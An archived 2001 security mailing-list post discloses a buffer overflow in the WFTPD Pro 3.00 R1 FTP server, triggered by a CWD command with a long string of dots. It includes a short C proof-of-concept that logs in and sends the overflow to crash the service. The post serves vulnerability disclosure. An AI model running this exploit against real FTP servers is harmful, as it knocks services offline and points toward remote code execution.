OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: se00020LION.CC
Date: Sat Mar 03 2001 - 12:51:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    When sending a command (cwd) followed by a long
    argument (~500 char '.')
    the server crashes with:

    Anwendungspopup: WFTPD Service Control:
    WFTPD.EXE - Fehler in Anwendung:
    Die Anweisung in "0x2e2e2e2e" verweist auf
    Speicher
    in "0x2e2e2e2e". Der Vorgang
    "read" konnte nicht auf dem Speicher durchgeführt
    werden.

    which means in English: Exception fault at:
    0x2e2e2e2e
    reading from 0x2e2e2e2e is not possible...

    Executing arbitrary code is possible

    The author has been contacted

    ----------------------
    se00020fhs-hagenberg.ac.at or
    se00020lion.cc

    Tested on win2k using trail version of WFTPD 3.00
    R1

    Simple exploit:

    //WFTPD Pro 3.00 R1 Buffer Overflow exploit
    //written by se00020fhs-hagenberg.ac.at

    #include <stdio.h>
    #include <winsock.h>
    #include <windows.h>
    #include <malloc.h>

    void main(){
            SOCKET sock_victim;
            WORD version=MAKEWORD(1,1);
            WSADATA wsadata;
            SOCKADDR_IN victim;
            int sockid;
            char buffer[1024];
            char exploitbuffer[800]={"CWD "};
            char recvbuffer[1024];

            WSAStartup(version, &wsadata);
            
            sock_victim=socket(AF_INET,
    SOCK_STREAM, IPPROTO_TCP);
            victim.sin_family=AF_INET;
            victim.sin_addr.s_addr=inet_addr
    ("10.17.3.44");
            victim.sin_port=htons(21);
            sockid=connect(sock_victim, (sockaddr*)
    &victim, sizeof(victim));
            
        
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            send(sock_victim, "USER test\r\n",strlen
    ("USER test\r\n"),0);
             recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            send(sock_victim, "PASS\r\n",strlen
    ("PASS\r\n"),0);
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            

            memset(exploitbuffer+4,'.',sizeof
    (exploitbuffer)-4);
            sprintf(buffer,"%s\r\n",exploitbuffer);
            
            send(sock_victim, buffer , sizeof(buffer),0);
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);

            closesocket(sockid);
            closesocket(sock_victim);

    }